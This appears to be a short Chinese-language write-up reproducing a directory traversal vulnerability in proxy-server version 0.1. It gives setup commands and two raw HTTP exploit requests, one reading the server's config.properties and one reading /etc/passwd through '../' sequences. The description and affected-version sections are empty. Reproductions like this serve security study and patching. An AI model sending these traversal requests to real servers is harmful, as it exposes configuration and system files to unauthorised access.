声明
好好学习,天天向上
漏洞描述
影响范围
复现过程
这里使用0.1版本
下载地址,复现只下载服务端版本即可,放在一个已经配置好java环境的linux的服务器中,proxy-server-0.1.zip
https://file.nioee.com/d/2e81550ebdbd416c933f/
执行
unzip proxy-server-0.1.zip
mv proxy-server-0.1 /usr/local/
vim /usr/local/proxy-server-0.1/conf/config.properties
看到了配置文件,不做修改
启动服务
cd /usr/local/proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh
环境启动后,访问
http://192.168.31.64:8090/
BP抓包,修改为如下,可以看到刚刚的那个配置文件
GET /../conf/config.properties HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
查看passwd,如果第二次半天出不来,可重新抓个包修改
GET /../../../../../../etc/passwd HTTP/1.1
Host: 192.168.31.64:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1